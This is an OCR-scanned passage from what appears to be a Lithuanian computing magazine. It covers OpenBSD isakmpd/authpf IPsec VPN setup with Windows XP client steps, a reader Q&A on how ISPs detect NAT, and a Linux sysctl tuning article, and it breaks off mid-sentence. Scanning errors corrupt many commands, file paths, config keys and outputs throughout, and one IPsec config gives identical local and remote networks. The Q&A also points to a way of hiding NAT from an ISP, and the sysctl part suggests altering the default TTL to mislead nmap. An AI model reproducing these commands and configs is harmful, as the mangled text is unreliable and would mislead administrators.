kiekį, tuo pačiu panaudojant skirtingus šifravimo algoritmus (pa- 
vyzdžiui, 3des, idea, cast, blowfish, ESP protokolo esp enc alg 
atributu — aes) ir autentifikacijos metodus: pagal slaptą frazę 
(mes aptarinėsime būtent šį metodą, tuo tarpu įspūdingo WLAN 
klientų skaičiaus atveju geriau būtų pasirinkti X.509 auth), ser- 
verinius raktus, Keynote ir X.509 sertifikatus. Demonas tiesiog 
sukrečia savo palaikomomis galimybėmis, todėl būtų sudėtinga 
surasti tokią VPN sukūrimo užduotį, su kuria jis negalėtų susi- 
doroti. 

Patogumo dėlei apsikeitimo raktais serverio pagrindinė konfi- 
gūracinė byla suskaidyta į sekcijas, kuriose yra direktyvos su 
priskirtomis reikšmėmis. Toliau pakomentuosiu esminius 
isakmpd.conf(5) dalykėlius: 


7 vi /et(/isakmpd/isokmpd.conf 

/“ Bendros paskirties sekcija: pasikartojimų kiekis, loikų nustotymai, klausomo tinklo sąsajos 
IP adresas */ 

[General] 

Retransmits = 5 

Exchange-max-time = 120 

Listen-on = 192.168.2.1 


/“ Išvardiname susijungimų fazes */ 
[Phase 1] 

Default = local-peers 
(Phose 2] 
Passive-connections — guthenticoted-peers 

/“ Patvirtiname pseudonimų nebuvimą ir apibrėžime slaptają frazę (preshared key) */ 
[local-peers] 

Phose = 1 

Local-address — 192.168.2.1 

Authentication = mypassword 

Configuration = isakmp-mainmode 


/" Sukuriame IPSec susijungimų sarašą */ 
Įauthenticated-peers] 

Phase = 2 

ISAKMP-peer = local-peers 

Loca|-ID = local-hetwork 

Remote-ID = remote-network 
Configuration isakmp-ąvick-mode 


/* Apibrėžiame enkapsuliuotų susijungimų maršrutus */ 
(local-network) 

ID-type = IPV4 ADDR SUBNET 

Network — 192.168.2.0 

Netmask = 255.255.255.0 


Įremote-network] 

ID-hype — IPV4 ADDR SUBNET 
Network = 192.168.2.0 
Netmask = 255.255.255.0 


/* Pagrindiniame režime nurodome srautus, specialų apsikeitimo paketais tipą bei su kuo 
šifruosime duomenis */ 

Įisakmp-main-mode] 

DOI — IPSEC 

EXCHANGE TYPE = ID PROT 

Tronsforms = 3DES-SHA 


/“ Greitame režime nurodome protokolą, šifro ir kolizijoms atsparia hešų funkcija */ 
[isakmp-guick-mode| 

DOI = IPSEC 

EXCHANGE TYPE = GUICK MODE 

Suites = OM-ESP-3DES-SHA-PFS-SUITE 


Dabar reikia sukurti isakmpd.policy(5), kurioje būtų aprašytos 
visų /IPSec susijungimų politikos: 


e vi /etc/isakmpd/isakmpd.policy 
KeyNote-Version; 2 
Authorizer; “POLIOY" 


Čonditions: app. domain "IPsec policy“ 88 
esp present = — "yes" 88 
esp enc algą = = "3des" -> "true"; 


Priskiriame korektiškas priėjimo prie konfigų teises: 


+ chown root:wheel /etc/isakmpd/isakmpd." 
Ž chmod 600 /etc/isakmpd/isokmpd." 


Dabar paleidžiame demoną į orbitą, prieš tai atsisakę /PV6 pro- 
tokolo ir NAT-Traversal realizacijos: 


2 isakmpd -4T 


[Didieji windozininkų žygdarbiai] Klientinės /PSec dalies konfi- 
gūracija WinXP sistemoje primena tikrą detektyvą: 


1. Start -> Run -> mm 

2. File -> Add/Remove Snap-in —>> IP Security Polig; Management > Local Compu- 
ter > Finish - > (lose 

3. Adion > Create IP Security Poliųy > Next - > Next - > nuimame varnelę Activate 
the default response rule > Edit properties > Next > Finish 

4. New IP Security Policy —> Properties —>> Add > Next > Tunnel Endpoint This 
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rule does not specify a tunnel > Network Type Local Area Network (LAN) > Authen- 
tication Method — Use this string to protect the key exchange (preshared key) -— nurodome 
mypassword iš /etc/isakmpd/isakmpd.conf — > IP Filter List ->Add —> Add ——> Next 


> Source Address — My IP Address — > Destination Address — A Specific IP Address — 
192.168.2.1 —> Select a protocol type — Any, 0 - > uždedame vamelę Edit properties 
> Finish > patikriname įvestus nustatymus > OK 

5. New IP Filter List -> Next > Filter Action — Reguire Security > Edit > 
uždedame Negotiate security ——> pažymime Sassion key perfect forward secrecy (PES) > OK 
> Next —- > Finish —> Apply -> OK 

6. Console! > File - > Save 

7. Perktauname kompiuterį arba perleidžiam (restart) IPSEC Services 

8. Start -> Run --> mm > File > Consolel > New IP Security Poliy >> Assign 
Taip pat kaip alternatyva galima pasinaudoti šiomis programo- 
mis: ipsecpol.exe/ipseccmd.exe (Win2k/WinXP Support Tools), SSH 
Sentinel, TheGreenBow VPN Client, SafeNet SoftRemoteLT. 


[Bandymų poligonas] Visi reikiami nustatymai sukonfigūruoti, 
telieka patikrinti mūsų konstrukcijos veikimą. Pridedam į siste- 
mą naują vartotoją, kuris priklauso Wi-Fi klasei, įeina | authpf 
grupę ir vietoje shello gauna /usr/sbin/authpf: 

7 useradd —m -c "Wili dient“ -g authpf L wifi 5 /ust/sbin/authpf jonos 
Už ji sugeneruojame 2048 bitų RSA raktą: 


7 sudo -u jonas ssh-keygen —! 150 


Leidžiame vartotojui autentifikuotis su viešu raktu: 
4 (p /home/jonos/.ssh/id rsa.pub /home/jonas/.ssh/authorized keys 


Using uRernaneė "evol". 
uthenticating with public 


key "imnported-openssh-key" 
21:14:29 2005 £ R 2 


Last login: Sun Aug 21 


UpenBSD 3.8-beta (GENERIC) 863: Sat Aug 20 13:16:4 

je lcome to OpenrBSD: The proactively securė Unix-likė operating system. 
Please use the sendbugil) utility t port bugs 11 thė systėn 

Before reporting a bug, pleazė try to reproducė 11 with thė latė 
version of the code. With bug reporta, please try to ensutr 1 
enough information t lėn is en 1, and 


» reproduce the proble: 


known fix for it exists, Include that a= well. 


vol. You are authenticatėd from host *19 
Pleasė play nice. 
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Gauname priėjima prie inteneto 
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2 chown jonos:authp! /home/jonas/.ssh/authorized keys 


Kliento pusėje atidarome Putty/SecureCRT, sukuriame naują se- 
siją, nurodome šliuzo IP adresą, vartotojo vardą ir viešo rakto 
buvimo vietą. Jeigu viskas sukonfigūruota korektiškai, po sėk- 
mingos autorizacijos serveryje pasikeis ugniasienės taisyklės ir 
vartotojas gaus priėjimą prie interneto. 

Kadangi w ir who neatvaizduoja PID reikšmių, šiuo metu prisi- 
jungusių vartotojų sąrašą galima peržiūrėti su ps arba su pfctl 
(čia authpf — inkaro „anchor“ pavadinimas, jonas — vartotojo 
vardas, 3884 — unikalus proceso identifikatorius): 


Yo ps ax | grep authpf 
3884 pl Is+ 0:00.01 -authpt: jonas(D192.168.2.2 (authp!) 


+ pldl a authpt -sA 
authpf/jonos(3884) 


Peržiūrėti konkretaus vartotojo ugniasienės taisykles galima taip: 


 pldl -a "authpl/jonas(3884)" —s rules 
pass in guick on ral0 inet from 192.168.2.2 to any 
pass out log gvick on Apl inet all keep state tagged 192.168.2.2 


Analogiškai peržiūrimos NAT lentelės ir nukreipimo taisyklės: 


* pic —a “authpf/jonas(3884)" —s nat 

nat on fxpl inet from 192.168.2.2 to any tag 192.168.2.2 -> (Apl) round-robin 

tdr pass on fxpl inet proto tep from any to any port — 4661 -> 192.168.2.2 

tdr pass on fxpl inet proto tep from any to any port = 4662 -> 192.168.2.2 

rdr pass on bpl inet proto udp from any to any port = 4665 -> 192.168.2.2 

tdr pass on fpl inet proto udp from any to any port = 4672 -> 192.168.2.2 

tdr on ral0 inet proto tep from 192.168.2.2 to any port = fip -> 127.0.0.1 port 8021 


[„Ipsecadm“: nukreipk šifruotą srautą reikiama linkme] 
Visame šiame reikale galima atsisakyti isakmpd ir pažiūrėti į 
ipsecadm(8), apsaugotų susijungimų valdymo programos pu- 
sę. Norint patikrinti jos veikimą, aptarsime tokį scenarijų, kai 
ir serveryje (TECHLAB), ir kliente (HOME) įdiegta OpenBSD 
sistema. 


juick on ral0ū 


sp state 


to ipencap from 192.168.2.0/24 t 
D 


Eytės: 


Ugniasienės taisyklių statistika 


[ HOME -(bp!)-— (hpO)-[ TECHLAB | 


Sukuriame du raktus: vieną srauto šifravimui (3DES, 192 bit), 
kitą — autentifikacijai (SHA1, 160 bit): 


[15P -— 


4 mkdir -m 700 /etd/ipsec 

4 openssl rand 24 | hexdump e '24/1 "0602x“ > /etc/ipsed/esp-enc-key 
+ openssl rand 20 | hexdump e 20/1 “0602x" > /etVipsed/esp-auth-key 
4 chmod 600 /etc/ipsec/esp-*-key 


Toliau, kad savęs neapsunkintume, galime pasinaudoti /usr/sha- 
re/ipsec kataloge esančiu šablonu: 


+ «p /usi/share/ipsec/rc.vpn /etd/ipsec/rc.vpn 


4 vi /etcipse(/rc.vpn 
/* Derinimo režime komandos išvedamos į ekraną be vykdymo, užkomentuojam */ 
> DEBUG= echo 


/* Nutolusio ir lokalaus kompiuterių IP adresai */ 
GW LOCAL=81.211.1.1 
GW REMOTE=85.140.2.2 


/* Nenurodome vidinių potinklių CIDR notaciju */ 
LOCAL NETWORKS ="" 
REMOTE NETWORKS="" 


/ Pasirinkti šitravimo ir autentifikacijos metodai */ 
ENC- 3des 
AUTH = sho1 


/* Specialūs indeksai, skirti tunelio sukūrimui */ 
SPI OUT= 1000 
SPI IN=1001 


/“ Nurodome absoliučius kelius iki bylų su raktais */ 
KEYFILE = /etc/ipsec/esp-enc-key 
AUTHKEYFILĖ = /etc/ipsec/esp-auth-key 


Kliento pusėje skriptas atrodys beveik taip pat, pasikeitimai mi- 
nimalūs: 


+ vi /etlipseV/rc.vpn 
[snip] 


GW LOCAL=85.140.2.2 
GW REMOTE = 81.211.1.1 


[snip] 
SPL 0UT- 1001 
SPI IN-— 1000 
Įsnip] 


Po to, kai su saugaus kopijavimo programa scp(8) raktai (/etc/ 
ipsec/esp-(auth,enc)-key) bus perduoti klientui, telieka kiek- 
viename tinklo mazge paleisti rc.vpn: 


serveržė sh /etc/ipse(/rcvpn 
dientž sh /etc/ipse(/rc.vpn 


Ir, jei būtina, jo paleidimą pridėti į vieną iš paleidimo bylų, pa- 
vyzdžiui, taip: 


7 vi /etVic.locol 
[ I /etc/ipsed/icvpn | 88 sh /etl/ipsec/rc.vpn 


[Naudingos smulkmenos] Norint OS branduolio paprašyti iš- 
vardinti veikiančius /PSec tunelius ir aktyvius SADB bazės įra- 
šus, galima pasinaudoti įrankiu ipsecct/(8): 


* ipsecctl —s all 

FLOWS; 

flow esp in from 192.168.2.2 to 192.168.2.1 peer 192.168.2.2 

flow esp out from 192.168.2.1 to 192.168.2.2 peer 192.168.2.2 

SADB: 

esp from 192.168.2.1 to 192.168.2.2 spi 0x443382b3 3des-cbc hmac-sha! 
esp from 192.168.2.2 to 192.168.2.1 spi Oxe6917ee7 3des-chc hmac-shal 


Gauti enkapsuliuotų susijungimų maršrutizavimo lentelę galima 
su netstat(1): 


Šo netstat nr f encap 

Routing tobles 

Encop: 

Source Port Destination Port Proto SA(Address/Proto/Type/Direction) 
192.168.2.2/32 0 192.168.2.1/32 0 0 192.168.2.2/50/use/in 
192.168.2.1/32 0 192.168.2.2/32 0 0 192.168.2.2/50/reguire/out 


Norint pašalinti visus IPSec srautus: 
2 ipsecadm flush 


Pseudojrenginys enc(4) yra speciali grįžtamojo ryšio (Ioop- 
back) sąsaja, leidžianti atlikti /PSec srauto filtravimą ir per- 
žiūrėti įeinančių/išeinančių paketų praėjimą (tai galioja tik 
transportiniam režimui) prieš jiems pakliūnant į ESP ir AH 
protokolų valdžią. Be abejo, norint atlikti šią operaciją, rei- 
kia turėti supervartotojo teises (kontrolinių sumų neatitiki- 
mas tavęs neturėtų trikdyti, kadangi mes klausomės pseu- 
dojrenginio): 


+ tpdump —n 6 tt wi encO port 445 
tepdump: WARNING: encO: no IPv4 addressassigned 
tepdumg: listening on enc0), link-type ENC 

Aug 13 18:55:31.373180 (authentic,confidential): 
SP) Ox0bf80add: 192.168.2.2.1066 
192.168.2.1.445; P 
1804009685:1804009748(63) ack 2812031580 
win 17520 (DF) (ml 128, id 33135, len 103) 

Aug 13 18:55:31.373589 (authentic,confidential): 
SP| Oxcd270528: 192.168.2.1.445 
192.168.2.2.1066: . 1:1425(1424) ack 63 win 
17088 (hl 64, id 46806, len 1464, bad cksum 
14! differs by 3902) 


Tokia sistema kartu su korektiškai sukonfigūruotu DHCP serve- 
rių Ir pusiau skaidriu filtru, kuris filtravimą atlieka pagal kliento 
MAC adresą (žr. ][-31/2005.12 straipsnį „Nematoma ugnia- 
sienė“), tau labai praverstų. Sėkmės! 


Su Cygwin galima kompiliuoti bet kokias *nix 

sistemoms skirtas programas, tačiau visoms 

joms norint jas paleisti reikia bibliotekos cyg- 
win1.dll. O ar galima programą sukompiliuoti taip, 
kad ji nebūtų susijusi su šia biblioteka? 


Cygwin dcc turi tokią opciją, kaip mnocygwin. 
Su šia opcija gaunama exe byla nepriklauso nuo 
cygwin bibliotekos ir reikalauja tik standartinių 
Microsoft bibliotekų. 
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Mano interneto ryšio tiekėjas griežtai draudžia 
naudoti NAT maršrutizavimą interneto dalinimui 
lokaliame tinkle. Sakyk, kaip jis tai gali susekti? 


Bet kuris IP paketas sudarytas iš keleto laukų. 
Pereinant per adresų transliavimą (NAT — Net- 


() work Address Translation) atliekantį maršrutiza- 
torių, dalis šių laukų keičiasi pagal dėsningus 


principus. TTL (Time To Live) laukas parodo maršru- 
tizatorių skaičių, kurį pristatymo metu nuo siuntėjo 
iki gavėjo gali pereiti IP paketas. Perėjus per marš- 
rutizatorių, TTL reikšmė sumažinama vienetu. Iš to 
išplaukia, jog iš lokalaus tinklo kompiuterių, kurie 
yra už NAT'inančio maršrutizatoriaus, siunčiamų pa- 
ketų TTL bus vienetu mažesni nei perduodami iš tos 
sistemos, kuri ir atlieka adresų transliavimą. Bet ku- 
ris tinklo programuotojas gali lengvai parašyti anali- 
zatorių, kuris pagal šį požymį nustatantį NAT'0 nau- 
dojimą. 

Dar vienas išdavikas — IP paketo identifikatorius. 
Kiekvienas paketas sistemoje turi identifikatorių, kuris 
yra vienetu didesnis už ankstesnį. Jeigu prie interne- 
to prijungtas tik vienas kompiuteris, tai išeinančių | 
internetą paketų identifikatorių seka bus teisinga 
(vaizdžiai šnekant: 1, 2, 3, .., n). Jeigu į internetą 
jungiasi ne viena mašina, tai išeinančiame tinklo 
sraute bus galima aptikti iš karto keletą nepriklau- 
somų sekų (1,11,2,12,3,13 ir t.t.). Pakliuvot! 
Būsiu sąžiningas ir pastebėsiu, jog nuslėpti NAT nau- 
dojimą visai įmanoma. Kaip tai padaryti, pasakoja- 
ma išsamiame mūsų svetainėje pateiktame straips- 
nyje (www.xakep.ru/post/29448/default.asp). 
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„Linux 

branduolio tiuningas 

KAI KURIAIS ATVEJAIS STANDARTINIAI BRAN- 

DUOLIO NUSTATYMAI YRA NEOPTIMALUS 
L IR KENKIA VISOS SISTEMOS NASUMUI. 
2 KAD VARTOTOJUI NEREIKETŲ KAPSTYTIS IS- 
? EITIES TEKSTUOSE IR IS NAUJO PERKOM- 


PILIUOTI BRANDUOLIO, BUVO SUGALVOTA 
PATOGI SĄSAJA, LEIDZIANTI DAUGELĮ BRAN- 
DUOLIO KINTAMŲJŲ KEISTI TIESIOG OS VEI- 
KIMO METU. 


UNITS 


Subtilus branduolio konfigūravimas 


panaudojant „sysctl“ mechanizmą 

[Teorija] Katalogas /proc/sys yra virtualios failų sistemos procfs, 
apie kurią aš pasakojau praėjusiame žurnalo numeryje, dalis. 
Pirmą kartą jis pasirodė 1.3.57 versijos branduolyje kaip sąsaja, 
leidžianti prieiti prie branduolio kintamųjų. Dabar per /proc/sys 
galima pakeisti failų sistemų, virtualios atminties, tinklo steko ir 
vidinių branduolio struktūrų nustatymus. Taip pat daugelyje distri- 
butyvų galima surasti patogų ir BSD sistemų vartotojams gerai 
pažįstamą įrankį /sbin/sysctl, kuris atlieka tas pačias funkcijas. 


Praktinės žinios 

Dabar pereikime prie paties tiuningo. Kataloge /proc/sys sau- 
gomi penki pagrindiniai elementai: 

„kernel — branduolio struktūros 

„vm — virtualios atminties posistemė 

„dev — įrangos valdymas 

„net — tinklo nustatymai 

„fs — failų sistemos 
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Per šiuose kataloguose esančias bylas galima valdyti atitinka- 
mas branduolio posistemes. Einami nustatymai gaunami nu- 
skaitant byla, o pakeitimai atliekami tiesiog įrašant į atitinkamą 


bylą. Savaime suprantama, rašyti teisę turi tik root. Pateiksiu 
pavyzdį. Sužinome einamą mūsų mašinos tinklo pavadinimą: 


S cat /proc/sys/kernel/hostname 
localhost 


Ir ji pakeičiame: 


2 acho linuxoid > /prod/sys/kernel/hosiname 
2 cat /proV/sys/kernel/hostname 
linuxoid 


Kaip matai, viskas labai paprasta ir suprantama. O dabar pa- 
darykime tą patį, tik naudodamiesi sysct!: 


2 sysdtl kernel.hostname 
kernel.hostname = localhost 

2 sysctl —w karnel.hostname = linuxoid 
kernel.hostname = linuxoid 


Tikriausiai tu pastebėjai, kad kintamojo pavadinimas — tai viso 
labo bylos pavadinimas be /proc/sys priešdėlio ir su tašku vieto- 
je / simbolio. 

Kad būtų dar patogiau, tokiems pakeitimams skirta konfigūra- 
cinė byla /etc/sysctl.conf, kur tu gali aprašyti bet kokius prieina- 
mus kintamuosius ir jų reikšmes. Dabar tau nereikia rūpintis, 
kad po perkrovimo nustatymai bus prarasti. 

Branduolio pasaulis 

Branduolio nustatymų keitimas — ne visada pasiteisinanti prie- 
monė, tačiau kai kuriais atvejais vis dėlto naudinga. Taigi mes 
atidžiai peržiūrėsime /proc/sys/kernel katalogą. 

Šiame kataloge galima rasti tris bylas, į kurias rašymas ne- 
galimas: ostype, osrelease ir version. Jų turinys yra toks: 
OS tipas (savaime suprantama, čia visada bus Linux), bran- 
duolio versija (pavyzdžiui, 2.6.11) ir branduolio sukompilia- 
vimo laikas, kur pirmasis eilutės skaičius parodo kompilia- 
vimų skaičių iš vieno išeities tekstų medžio. Tiesą sakant, 
aš taip ir nesupratau, kam šios bylos reikalingos, kai yra / 
proc/version. 


UTdės Litos 501 sut jetės, tais filė js a ryabkiis Iisk 
Mene nmand Tila 
Miepiius Ls spa 50 oeidi 
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Štai ką mums apie /proc/sys pasakoja dokumentacija 


Dar dvi į akis krintančios bylos: hostname ir domainname. Kaip 
galima numanyti, jose vaizduojamas mašinos tinklinis pavadi- 
nimas ir domenas, ir į jas, priešingai nei į ankstesnes, galima 
rašyti. Jų panaudojimo pavyzdį aš jau pateikiau aukščiau. 
Tikiuosi, tu žinai, kas vyksta su sistema, kai tu nuspaudi trijų 
klavišų kombinaciją <Ctrl-Alt-Del>? Iš tiesų vyksta banalus 
dalykas: branduolys init procesą perkelia į 6 režimą, kas sukelia 
perkrovimą su korektišku visų servisų sustabdymu. Tokio efekto 
reikia tikėtis po kiekvieno stebuklingosios kombinacijos nuspau- 
dimo, kol tik byloje /proc/sys/kernel/ctrl--alt-del bus įrašytas nulis. 
Jeigu į šią bylą įrašytum skaičių, didesnį už nulį, tai branduolys 
tuojau pat perkrautų kompiuterį (neiškviesdamas init, nesin- 
chronizuodamas buferių ir t.t.). 

Modulių užkrovimui veikimo metu (on-the-fly) branduolys nau- 
doja standartinę programą /sbin/modprobe. Tuo galima įsitikin- 
ti žvilgtelėjus į bylą /proc/sys/kernel/modprobe. Jeigu komanda 
modprobe yra kur nors kitoje vietoje arba vadinasi kitaip, apie 
tai reikia pranešti sistemai, į šią bylą įrašius pakeistą reikšmę. 
Panašią funkciją atlieka ir byla /proc/sys/kernel/hotplug. Kiek- 
vieną kartą prie kompiuterio prijungus naują hotplug įrenginį 
bus paleidžiama programa, kurios pavadinimas įrašytas į šią 
bylą. Čia tu gali įrašyti /bin/true, jeigu sistemoje nenumatytas 
tokių įrenginių prijungimas. 

i386 architektūroje maksimalios UID ir GID reikšmės lygios 
65535 (16 bitų). Jeigu bus nurodytas šį skaičių viršijantis iden- 
tifikatorius, branduolys pats panaudos reikšmę pagal nutylėji- 
mą, kuri įrašyta bylose /proc/sys/kernel/overflowuid ir /proc/sys/ 
kernel/overflowgid. Pagal nutylėjimą abiejose bylose yra skai- 
čius 65534 ir nėra ypatingos prasmės jį keisti. 

Jeigu branduolys palaiko SystemV tarpprocesinę komunikaciją 
(opcija General setup -> System V IPC), tai kataloge /proc/ 
sys/kernel papildomai bus dar septynios bylos: sem, msgmax, 
msgmnb, msgmni, shmall, shmmax, shmmni. Šiaip jau Sys- 
temV IPC tapo pačia nenaudingiausia į Linux perkelta origina- 
laus UNIX ypatybe. Šiuo metu iš trijų komunikacijos tipų nau- 
dojama tik bendrai panaudojama atmintis, kurios valdymas 
atliekamas per bylas shmall (maksimalus segmentų kiekis), 
shmmax (maksimalus segmento dydis) ir shmmin (minimalus 
segmento dydis). 

Jeigu pas tave yra programa, vienu metu dirbanti su dideliu bylų 
kiekiu (duomenų bazių ar web serveris ir pan.), tai būtų naudin- 
ga padidinti vienu metu atidarytų bylų kiekį, į /proc/sys/kernel/ 
pid max įrašant reikiamą reikšmę. 

Dabar pereikime prie labiau sisteminių dalykų. Tu tikriausiai esi 
susidūręs su tokia problema, kaip „branduolio panika“ („kernel 
panic“). Taip nutinka tuomet, kai branduolys dėl kažkokių prie- 
žasčių negali toliau veikti (dažniausiai pasitaikanti priežastis — 
šakninės failų sistemos palaikymo nebuvimas). Pagal nutylėji- 
mą mašina tiesiog sustoja, tačiau būtų neblogai padaryti nedi- 
delį užlaikymą, po kurio būtų atliekamas perkrovimas. Tai leng- 
va padaryti, į bylą /proc/sys/kernel/panic įrašius skaičių, kuris ir 
atspindi šį užlaikymą sekundėmis. Ne tokia graudi situacija — 
tai oops, kai branduolys dar sugeba tęsti darbą, ką ir daro pagal 
nutylėjimą. Tačiau į /proc/sys/kernel/panic on oops įrašęs vie- 
netą, tu priversi branduolį panikuoti ir šiuo atveju. 

Formuojant core bylą, jos pavadinimas kuriamas sujungiant nu- 
lūžusios programos pavadinimą ir praplėtimą, kuris paimamas 
iš /proc/sys/kernel/core patterm. Savaime suprantama, jeigu tau 
kuo nors neįtiko pagal nutylėjimą naudojamas .core praplėti- 
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mas, tu gali lengvai jį pakeisti. Papildomai tu į bylą /proc/sys/ 
kernel/core uses pid gali įrašyti vienetą, po ko prie core pra- 
plėtimo taip pat bus pridedamas ir proceso PID. Tai patogu, kai 
reikia atskirai derinti keletą proceso egzempliorių. 

Linux branduolyje egzistuoja tokia sąvoka, kaip „sugedimas“. Ji 
išreiškiama skaičiumi, kuris yra byloje /proc/sys/kernel/tainted. 
Jeigu buvo užkrautas modulis su licencija, kuri nesuderinama 
su GPL, tai šis skaičius pasidarys lygus vienetui. Dvejetas reiš- 
kia, kad kažkoks modulis buvo užkrautas priverstinai (insmod - 
f). Keturi reiškia, kad daugiaprocesorinėje sistemoje naudoja- 
mi procesoriai, kurie tam nėra skirti. 


[Užmetam tinklus] Linux sistemoje tinklo opcijų ne šiaip sau 
daug, o labai daug (tam įtakos turi serverinė OS istorija). Taigi 
aš neaptarinėsiu visų nustatymų, o apsistosiu tik prie svarbiau- 
sių ir naudingiausių. 

Pagrindiniai katalogai, į kuriuos derėtų atkreipti dėmesį: /proc/ 
sys/net/core — tinklo steko nustatymai, /proc/sys/net/ipv4 — 
TCP/IP protokolo nustatymai, /proc/sys/net/ipv4/conf — tinklo 
sąsajų nustatymai. Kataloge /proc/sys/net/core saugomų bylų 
iš viso geriau neliesti, nes taip galima ką nors sugadinti. Tačiau 
jeigu tavo valdžioje yra apkrautas serveris, tuomet rekomen- 
duojama iki 1Mb padidinti įeinančių ir išeinančių buferių dydį, 
kas realizuojama į bylas rmem default, rmem max, wmem de- 
fault ir wmem max įrašant skaičių 1048576. 

Protinga TCP/IP steko konfigūracija gali padidinti našumą ir ap- 
saugoti nuo tam tikrų tinklo atakų tipų. Pradžiai nurodysime 
branduoliui neatsiliepti į transliuojančius (broadcast) pingus, kad 
mūsų kompiuterio niekas negalėtų panaudoti DD0S atakoms 
atlikti. Tam į bylą icmp echo ignore broadcasts įrašysime vie- 
netą. Dabar apsisaugosime nuo syn-flood atakų, įjungdami op- 
cija (įrašydami vienetą) tcp syncookies. Jeigu tavo mašina ne- 
naudojama kaip maršrutizatorius, tu taip pat gali atjungti ir op- 
ciją ip forward. 

Pabandysime apgauti tokias programas kaip nmap, kurios mo- 
ka nustatyti OS tipą pagal tinklo steko savybes. Tam pakeisime 
TTL reikšmę pagal nutylėjimą (64) ir į bylą ip default tt! įrašysi- 
me skaičių 128. Dabar šiek tiek optimizuojančių dalykėlių. Su- 
mažinsime bandymų palaikyti susijungimą skaičių ir į top kee- 
palive probes įrašysime dvejetą. Sumažinsime paketų siunti- 
mo, skirto susijungimo palaikymui, dažnį iki 30 minučių (pagal 
nutylėjimą 2 valandos), į tcp keepalive time įrašydami 1800. 
Taip pat per bylą tep window scaling atjungsime taip vadina- 
mą window scaling. Sumažinsime FIN paketo laukimo laiką iki 


unix.max dgram.glen = 10 

ipv4.ip.conntrack max = 8184 
ipv4.netfilter. ip conntrack tco max retrans = 3 
ipvė.netfilter.ip.conntrack.tcp.be. liberal = 0 
ipv4.netfilter. ip conntrack.tcp.loose = 3 
ipv4.netfilter. ip conntrack. tcp.timeout max retrans = 300 
ipv4.netfilter.ip.conntrack log. invalid = O 
net.ipv4.netfilter. ip conntrack generic.timeout = 600 
net.ipv4.netfilter. ip conntrack icmp timeout = 30 
net.ipv4.netfilter.ip conntrack udp.t imeout stream = 180 
net.ipv4.netfilter. ip. conntrack udp.timeout = 30 
net.ipv4.netfilter. ip. conntrack tcp.timeout. close = 10 
net.ipv4.netfilter.ip.conntrack tcp.timeout time wait = 120 
net. ipv4.netfilter. ip conntrack. tcp.timeout last ack = 30 
net.ipv4.netfilter. ip conntrack tcp.timeout close wait = 60 
net.ipv4.netfilter. ip. conntrack tcp.timeout fin wait = 120 
| ika ia = 432000 


Sysct! kintamųjų sąrašas 
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pilno susijungimo uždarymo (tcp fin timeout=30). Taip pat ga- 
lima atjungti tcp sack, tcp timestamps opcijas bei apkrautam 
serveriui pakeisti prieinamų lokalių jungčių diapazoną, į ip Io- 
cal port range bylą įrašius seką 16384 61000. 

Kataloge /proc/sys/net/ipv4/conf yra keletas katalogų, kurie pa- 
vadinti tinklo sąsajų vardais. Jų turinys visiškai identiškas. Tarp 
šių katalogų galima surasti specialų katalogą all, kurio pakeiti- 
mai turi įtakos visoms sąsajoms. Tiesa sakant, čia nėra ką keisti. 
Tiesiog atjungsime paketų nukreipimą (forwarding), jeigu tik, be 
abejo, tavo kompiuteris neveikia kaip maršrutizatorius. Tam į 
bylą forwarding įrašysime nulį. Taip pat įjungsime visų paketų 
su nežinomu atgaliniu adresu žurnalizavimą (log martians=1). 
Kaip tu jau tikriausiai supratai, jeigu atgalinis adresas nėra ži- 
nomas, tai reiškia, kad jis pakeistas. 


[Bylų rankomis neliesti] Failų sistemų nustatymai saugomi 
kataloge /proc/sys/fs. Poreikis taisyti šiame kataloge saugomas 
bylas iškyla labai retai, tačiau siekiant susidaryti pilną vaizdą, 
mes vis dėlto aptarsime kai kuriuos jo elementus. 

Tikriausiai vienintelis dalykas, kurį tau kada nors teks keisti 
tai maksimalus vienu metu atidarytų bylų kiekis. Tai daroma į 
bylą file-max įrašant atitinkamą reikšmę. Jeigu pas tave nėra 
apkrauto duomenų bazių arba web serverio, tai keisti reikšmę 
pagal nutylėjimą nėra jokios prasmės. Einamu metu atidarytų 
bylų skaičių galima sužinoti iš bylos file-nr, kurioje saugomi trys 
skaičiai: atidarytų bylų skaičius, nulis (2.6 šakos branduoliuose 
visada nulis) ir reikšmė iš file-max bylos. Pavyzdžiui, pas mane 
šioje byloje dabar yra štai kas: 575 O 12408. 

Sukompiliavęs branduolį su opcija Executable file formats -> 
Kernel support for MISC binaries, tu gauni įdomią galimybę iš- 
mokyti branduolį įvairių vykdomų bylų formatų. Teoriniame lygy- 
je technologija labai paprasta. Mes tiesiog branduoliui nurodo- 
me, kad, pavyzdžiui, bylas su praplėtimu .exe derėtų paleisti su 
wine. Dabar jeigu tu parašysi 


S „lile.exe 
tai branduolys įvykdys komandą wine file.exe ir programa bus 


sėkmingai paleista. Patogu, tiesa? Pažiūrėkime, kaip tai atrodo 
praktikoje. Iš pradžių sumontuojame virtualią FS binfmt misc: 


-PWu-P--P-- 1 root root 0 2005-08-28 17:23 msgmi 
=P--P--P-- 1 root root 0 2005-08-28 17:23 ngroups max 
=P--P--P-- 1 root root 0 2005-08-28 17:23 osrelease 
=P--P--P-- 1 root root 0 2005-08-28 17:23 ostype 
-PU-P---- 1 root root 0 2005-08-28 17:23 overt lowgid 
-ru-P--F-- 1 root root G 2005-08-28 17:23 overf lowuid 
-rwu-P--P-- 1 root root 0 2005-08-28 17:23 panic 
-Pu-P--"-- 1 root root 0 2005-08-28 17:23 panic on oops 
-ru-P--7-- 1 roct root 0 2005-08-28 17:23 pid.max 
-rw-r--P-- 1 root root 0 2005-08-28 17:23 printk 
-rwu=P--"-- 1 root root 0 2005-08-28 17:23 printk.ratelimit 
-Pru=r--r-- 1 root root 0 2005-08-28 17:23 printk ratelimit burst 
dr-xr-w7-x 2 roct root 0 2005-08-28 17:23 pty/ 
dr-xr-xr-x 2 root root 0 2005-08-28 17:23 randon/ 
-ru-P--"-- 1 root root 0 2005-08-28 17:23 sem 
-ru=r--P-- 1 Foot root ū 2005-08-28 17:23 shmali 
-Pu-P--P-- 1 root root 0 2005-08-28 17:23 shmmax 
-ru-P--r-- 1 root root O 2005-08-28 17:23 shmmi 
-ru-r--P-- 1 root root 0 2005-08-28 17:23 sųsrą 
"P--P--9-- 1 root root 0 2005-08-28 17:23 tainted 
-rw-P--r-- 1 root root 0 2005-08-26 17:23 threads-max 
-P--P--r-- 1 root root 0 2005-08-28 17:23 version 


>> 


Katalogo /proc/sys/kernel pilnumas 
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Taisome /etc/sysctl.conf 


* mount bintmt misc —! binfmt misc /proc/sys/ts/binfmt misc 


Dabar į bylą /proc/sys/fs/binfmt misc/register įrašome in- 
